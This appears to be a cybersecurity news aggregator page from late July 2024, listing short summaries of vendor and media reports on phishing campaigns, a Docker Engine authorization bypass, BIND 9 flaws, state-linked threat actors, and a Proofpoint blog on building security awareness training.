Highly sophisticated, well-funded, and strategically motivated nation-state cybersecurity threats are complex and challenging, requiring advanced cybersecurity measures, threat intelligence, and international cooperation. Government agencies or state-sponsored groups are engaging in cyber-attacks for various reasons, including espionage, sabotage, or political influence. Threat ★★★
globalsecuritymag.webp 2024-07-25 13:02:02 Doppelgänger: Information manipulation operations under way in Europe and the United States (direct link) HarfangLab's Cyber Threat Research team investigated the Doppelgänger information manipulation operations from mid-June to mid-July in order to provide additional intelligence on the associated infrastructure, tactics and motivations in Europe and the United States, where political elections are occupying the attention of the media and social networks. - Investigations Threat ★★★★
Fortinet.webp 2024-07-25 13:00:00 Phishing Campaign Targeting Mobile Users in India Using India Post Lures
(direct link)
The FortiGuard Labs Threat Research team recently observed a number of social media posts commenting on a fraud campaign targeting India Post users. Learn more.
Threat Mobile ★★★
News.webp 2024-07-25 12:03:21 Kaspersky says Uncle Sam snubbed proposal to open up its code for third-party review
(direct link)
Those national security threat claims? 'No evidence,' VP tells The Reg Exclusive Despite the Feds' determination to ban Kaspersky's security software in the US, the Russian business is moving forward with another proposal to open up its data and products to third-party review – and prove to Uncle Sam that its code hasn't been compromised by Kremlin spies…
Threat ★★★
The_Hackers_News.webp 2024-07-25 11:17:00 Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins
(direct link)
Docker is warning of a critical flaw impacting certain versions of Docker Engine that could allow an attacker to sidestep authorization plugins (AuthZ) under specific circumstances. Tracked as CVE-2024-41110, the bypass and privilege escalation vulnerability carries a CVSS score of 10.0, indicating maximum severity. "An attacker could exploit a bypass using an API request with Content-Length set
Vulnerability Threat ★★★
SlashNext.webp 2024-07-25 11:00:48 Thawing Your Email Security Strategy with Frost's 2024 Radar Report: A Dynamic Cyber Threat Landscape
(direct link)
In today's digital age, email remains the primary conduit for business communication, making it a prime target for cybercriminals. The Frost Radar Research Report on Email Security for 2024 underscores the critical importance of robust email security measures amidst an ever-evolving threat landscape. With the proliferation of phishing attacks and malware, the need for advanced […]
Malware Threat ★★★
The_Hackers_News.webp 2024-07-25 11:00:00 CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software
(direct link)
The Internet Systems Consortium (ISC) has released patches to address multiple security vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could be exploited to trigger a denial-of-service (DoS) condition. "A cyber threat actor could exploit one of these vulnerabilities to cause a denial-of-service condition," the U.S. Cybersecurity and
Vulnerability Threat ★★★
BlackBerry.webp 2024-07-25 08:01:00 SideWinder Utilizes New Infrastructure to Target Ports and Maritime Facilities in the Mediterranean Sea
(direct link)
As part of our continuous threat hunting efforts, the BlackBerry Threat Research and Intelligence team has discovered a new campaign by the threat actor SideWinder, targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea.
Threat APT-C-17 ★★★
ProofPoint.webp 2024-07-25 06:04:58 3 Tips to Build an Effective Security Awareness Program for Your Employees
(direct link)
There are three cybersecurity truths that have stood the test of time (so far). Most breaches involve the human element. The latest Data Breach Investigations Report (DBIR) from Verizon notes that more than three-quarters (76%) of all breaches involve a human element. Phishing is one of the most common tactics for gaining initial access to a business. The DBIR says phishing was the second-most used tactic in 2023, right after stolen credentials. (Notably, credentials are often lost in phishing attacks first.) People are willing to take risks. That's why they often fall victim to attacks: because they take risky actions, like clicking on links and opening attachments from people they don't know. Research for our 2024 State of the Phish report shows that 68% of people do this. Given these truths, a human-centric security strategy is critical to protecting an organization. And mitigating human risk should be an important foundational pillar. This approach to cybersecurity recognizes that while technological solutions are essential, they are not sufficient on their own. Human behavior must be addressed directly. If you build an awareness program that is guided by threat intelligence and gives users the tools to respond to phishing attacks, you can attain quantifiable results. In this blog, we'll discuss three tips that you can use right now to build your security awareness training program in a way that empowers your employees to change their behavior. Tip 1: Prioritize high-risk user groups Human-centric cybersecurity starts with having visibility into who presents the greatest risk to your business. Often, the actions of a very small percentage of employees are the root cause of most security incidents. When you understand who presents the most risk, you can maximize your program's impact by improving the resilience of these individuals.
For our 2024 State of the Phish report, we asked information security professionals who they believe represent the greatest risk to their organizations. The top group were the users who had access to critical data (privileged users). [Chart: users who represent risk within companies. Source: 2024 State of the Phish report from Proofpoint.] Privilege risk is one key factor in quantifying total human risk. It considers the amount of damage that could result from a successful attack. However, you must also consider: Attack risk, which reflects that the more a person has been attacked in the recent past, the higher the probability that they will be attacked in the near future. Vulnerability risk, which evaluates the probability that an attack would be successful if a person is attacked. For this risk factor, it is important to track both real and simulated user behaviors, such as actual URL clicks within live email and performance against security awareness knowledge assessments and phishing simulations. Proofpoint makes it easy to quantify human risk and identify who represents the greatest risk to your business. Instead of manually tracking human risk across the three key risk factors of privilege, attack and vulnerability, our customers can use Proofpoint Nexus People Risk Explorer (NPRE). With NPRE, each person receives a user risk score based on their behavior and identity information. Users are automatically grouped based on their scores. With user risk insights from NPRE, you can easily prioritize which groups need the most attention and decide how to best deliver your training to maximize its impact. [Figure: a view of the dashboard for Nexus People Risk Explorer.] Tip 2: Keep your program agile The threat landscape impacts every business differently. Comparing a financial services company to a manufacturing company may show that the former is targeted more often with ransomware than with supply chain-based BEC attacks.
It is important to keep your program agile so that you can easily adjust Ransomware Data Breach Tool Vulnerability Threat Cloud ★★★
Last update at: 2024-07-29 21:18:47